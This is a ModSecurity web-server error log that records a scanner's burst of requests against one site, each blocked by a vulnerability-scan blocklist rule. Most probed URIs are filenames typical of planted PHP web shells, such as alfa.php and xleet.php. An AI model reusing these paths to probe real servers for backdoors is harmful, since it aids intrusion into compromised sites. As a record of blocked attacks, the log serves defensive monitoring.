[Tue May 26 13:11:27.973714 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index/chosen.php"] [unique_id "ahVOp-vOeft4ltnLrH4vNwAAAEU"]
[Tue May 26 13:11:27.973847 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/index/chosen.php"] [unique_id "ahVOp-vOeft4ltnLrH4vNwAAAEU"]
[Tue May 26 13:11:28.119265 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:59289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/about/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vPAAAAEk"]
[Tue May 26 13:11:28.119358 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:59289] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/about/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vPAAAAEk"]
[Tue May 26 13:11:28.261160 2026] [security2:error] [pid 496740:tid 496900] [client 20.151.117.104:44968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/as/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vSAAAAB4"]
[Tue May 26 13:11:28.261250 2026] [security2:error] [pid 496740:tid 496900] [client 20.151.117.104:44968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/as/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vSAAAAB4"]
[Tue May 26 13:11:28.403784 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:6719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/init.php"] [unique_id "ahVOqOvOeft4ltnLrH4vUwAAACk"]
[Tue May 26 13:11:28.403898 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:6719] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/init.php"] [unique_id "ahVOqOvOeft4ltnLrH4vUwAAACk"]
[Tue May 26 13:11:28.553051 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:16131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vVwAAADw"]
[Tue May 26 13:11:28.553160 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:16131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vVwAAADw"]
[Tue May 26 13:11:28.664277 2026] [security2:error] [pid 496740:tid 496907] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOqOvOeft4ltnLrH4vRgAAACU"]
[Tue May 26 13:11:28.695084 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/chosen/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vXgAAADA"]
[Tue May 26 13:11:28.695176 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/chosen/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vXgAAADA"]
[Tue May 26 13:11:28.837086 2026] [security2:error] [pid 496740:tid 496983] [client 20.151.117.104:5465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/css/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vZwAAAHE"]
[Tue May 26 13:11:28.837183 2026] [security2:error] [pid 496740:tid 496983] [client 20.151.117.104:5465] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/css/chosen.php"] [unique_id "ahVOqOvOeft4ltnLrH4vZwAAAHE"]
[Tue May 26 13:11:28.982609 2026] [security2:error] [pid 496740:tid 496964] [client 20.151.117.104:42049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOqOvOeft4ltnLrH4vbgAAAF4"]
[Tue May 26 13:11:29.053864 2026] [security2:error] [pid 496740:tid 496987] [client 20.151.117.104:42049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/style.php"] [unique_id "ahVOqevOeft4ltnLrH4vdAAAAHU"]
[Tue May 26 13:11:29.053980 2026] [security2:error] [pid 496740:tid 496987] [client 20.151.117.104:42049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/style.php"] [unique_id "ahVOqevOeft4ltnLrH4vdAAAAHU"]
[Tue May 26 13:11:29.203234 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:54402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/admin.php"] [unique_id "ahVOqevOeft4ltnLrH4vdgAAAH0"]
[Tue May 26 13:11:29.203340 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:54402] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/admin.php"] [unique_id "ahVOqevOeft4ltnLrH4vdgAAAH0"]
[Tue May 26 13:11:29.346191 2026] [security2:error] [pid 496740:tid 496892] [client 20.151.117.104:30880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/inputs.php"] [unique_id "ahVOqevOeft4ltnLrH4vegAAABY"]
[Tue May 26 13:11:29.346289 2026] [security2:error] [pid 496740:tid 496892] [client 20.151.117.104:30880] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/inputs.php"] [unique_id "ahVOqevOeft4ltnLrH4vegAAABY"]
[Tue May 26 13:11:29.495498 2026] [security2:error] [pid 496740:tid 496934] [client 20.151.117.104:6662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file.php"] [unique_id "ahVOqevOeft4ltnLrH4vhAAAAEA"]
[Tue May 26 13:11:29.495608 2026] [security2:error] [pid 496740:tid 496934] [client 20.151.117.104:6662] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file.php"] [unique_id "ahVOqevOeft4ltnLrH4vhAAAAEA"]
[Tue May 26 13:11:29.638771 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:28907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wk/index.php"] [unique_id "ahVOqevOeft4ltnLrH4vigAAAGQ"]
[Tue May 26 13:11:29.638886 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:28907] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wk/index.php"] [unique_id "ahVOqevOeft4ltnLrH4vigAAAGQ"]
[Tue May 26 13:11:29.782017 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:6657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/about.php"] [unique_id "ahVOqevOeft4ltnLrH4vjwAAABA"]
[Tue May 26 13:11:29.782158 2026] [security2:error] [pid 496740:tid 496886] [client 20.151.117.104:6657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/about.php"] [unique_id "ahVOqevOeft4ltnLrH4vjwAAABA"]
[Tue May 26 13:11:29.931669 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:59309] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "grandconclaveindia.org.in"] [uri "/1.php"] [unique_id "ahVOqevOeft4ltnLrH4vmQAAAA4"]
[Tue May 26 13:11:29.931803 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:59309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/1.php"] [unique_id "ahVOqevOeft4ltnLrH4vmQAAAA4"]
[Tue May 26 13:11:29.931892 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:59309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/1.php"] [unique_id "ahVOqevOeft4ltnLrH4vmQAAAA4"]
[Tue May 26 13:11:30.075342 2026] [security2:error] [pid 496740:tid 496978] [client 20.151.117.104:30869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/alfa.php"] [unique_id "ahVOquvOeft4ltnLrH4vnQAAAGw"]
[Tue May 26 13:11:30.075434 2026] [security2:error] [pid 496740:tid 496978] [client 20.151.117.104:30869] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/alfa.php"] [unique_id "ahVOquvOeft4ltnLrH4vnQAAAGw"]
[Tue May 26 13:11:30.217237 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:16168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/edit.php"] [unique_id "ahVOquvOeft4ltnLrH4vpAAAAB8"]
[Tue May 26 13:11:30.217339 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:16168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/edit.php"] [unique_id "ahVOquvOeft4ltnLrH4vpAAAAB8"]
[Tue May 26 13:11:30.360217 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/elp.php"] [unique_id "ahVOquvOeft4ltnLrH4vrAAAAC0"]
[Tue May 26 13:11:30.360306 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:54409] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/elp.php"] [unique_id "ahVOquvOeft4ltnLrH4vrAAAAC0"]
[Tue May 26 13:11:30.509322 2026] [security2:error] [pid 496740:tid 496924] [client 20.151.117.104:54413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/classwithtostring.php"] [unique_id "ahVOquvOeft4ltnLrH4vtAAAADY"]
[Tue May 26 13:11:30.509482 2026] [security2:error] [pid 496740:tid 496924] [client 20.151.117.104:54413] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/classwithtostring.php"] [unique_id "ahVOquvOeft4ltnLrH4vtAAAADY"]
[Tue May 26 13:11:30.652063 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:42098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/666.php"] [unique_id "ahVOquvOeft4ltnLrH4vtgAAAHw"]
[Tue May 26 13:11:30.652209 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:42098] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/666.php"] [unique_id "ahVOquvOeft4ltnLrH4vtgAAAHw"]
[Tue May 26 13:11:30.800013 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:6683] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOquvOeft4ltnLrH4vuAAAAEE"]
[Tue May 26 13:11:30.871774 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:6683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws54.php"] [unique_id "ahVOquvOeft4ltnLrH4vvAAAACY"]
[Tue May 26 13:11:30.871908 2026] [security2:error] [pid 496740:tid 496908] [client 20.151.117.104:6683] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws54.php"] [unique_id "ahVOquvOeft4ltnLrH4vvAAAACY"]
[Tue May 26 13:11:31.017057 2026] [security2:error] [pid 496740:tid 496992] [client 20.151.117.104:6695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/deepseek_d.php"] [unique_id "ahVOq-vOeft4ltnLrH4vxQAAAHo"]
[Tue May 26 13:11:31.017177 2026] [security2:error] [pid 496740:tid 496992] [client 20.151.117.104:6695] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/deepseek_d.php"] [unique_id "ahVOq-vOeft4ltnLrH4vxQAAAHo"]
[Tue May 26 13:11:31.167814 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:37153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/nw.php"] [unique_id "ahVOq-vOeft4ltnLrH4vzgAAAFQ"]
[Tue May 26 13:11:31.167916 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:37153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/nw.php"] [unique_id "ahVOq-vOeft4ltnLrH4vzgAAAFQ"]
[Tue May 26 13:11:31.315965 2026] [security2:error] [pid 496740:tid 496950] [client 20.151.117.104:6688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xleet.php"] [unique_id "ahVOq-vOeft4ltnLrH4v0AAAAFA"]
[Tue May 26 13:11:31.316045 2026] [security2:error] [pid 496740:tid 496950] [client 20.151.117.104:6688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xleet.php"] [unique_id "ahVOq-vOeft4ltnLrH4v0AAAAFA"]
[Tue May 26 13:11:31.458359 2026] [security2:error] [pid 496740:tid 496897] [client 20.151.117.104:42057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp.php"] [unique_id "ahVOq-vOeft4ltnLrH4v1AAAABs"]
[Tue May 26 13:11:31.458465 2026] [security2:error] [pid 496740:tid 496897] [client 20.151.117.104:42057] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp.php"] [unique_id "ahVOq-vOeft4ltnLrH4v1AAAABs"]
[Tue May 26 13:11:31.601161 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:27681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/155.php"] [unique_id "ahVOq-vOeft4ltnLrH4v2QAAACk"]
[Tue May 26 13:11:31.601322 2026] [security2:error] [pid 496740:tid 496911] [client 20.151.117.104:27681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/155.php"] [unique_id "ahVOq-vOeft4ltnLrH4v2QAAACk"]
[Tue May 26 13:11:31.745011 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:40667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/96i.php"] [unique_id "ahVOq-vOeft4ltnLrH4v3gAAAB8"]
[Tue May 26 13:11:31.745132 2026] [security2:error] [pid 496740:tid 496901] [client 20.151.117.104:40667] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/96i.php"] [unique_id "ahVOq-vOeft4ltnLrH4v3gAAAB8"]
[Tue May 26 13:11:31.893873 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:44930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/as.php"] [unique_id "ahVOq-vOeft4ltnLrH4v4AAAAHQ"]
[Tue May 26 13:11:31.894003 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:44930] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/as.php"] [unique_id "ahVOq-vOeft4ltnLrH4v4AAAAHQ"]
[Tue May 26 13:11:32.037329 2026] [security2:error] [pid 496740:tid 496922] [client 20.151.117.104:16135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/php8.php"] [unique_id "ahVOrOvOeft4ltnLrH4v5QAAADQ"]
[Tue May 26 13:11:32.037418 2026] [security2:error] [pid 496740:tid 496922] [client 20.151.117.104:16135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/php8.php"] [unique_id "ahVOrOvOeft4ltnLrH4v5QAAADQ"]
[Tue May 26 13:11:32.186538 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:28884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/admin.php"] [unique_id "ahVOrOvOeft4ltnLrH4v7QAAAHI"]
[Tue May 26 13:11:32.186631 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:28884] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/admin.php"] [unique_id "ahVOrOvOeft4ltnLrH4v7QAAAHI"]
[Tue May 26 13:11:32.330257 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:27669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/222.php"] [unique_id "ahVOrOvOeft4ltnLrH4v8wAAACs"]
[Tue May 26 13:11:32.330394 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:27669] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/222.php"] [unique_id "ahVOrOvOeft4ltnLrH4v8wAAACs"]
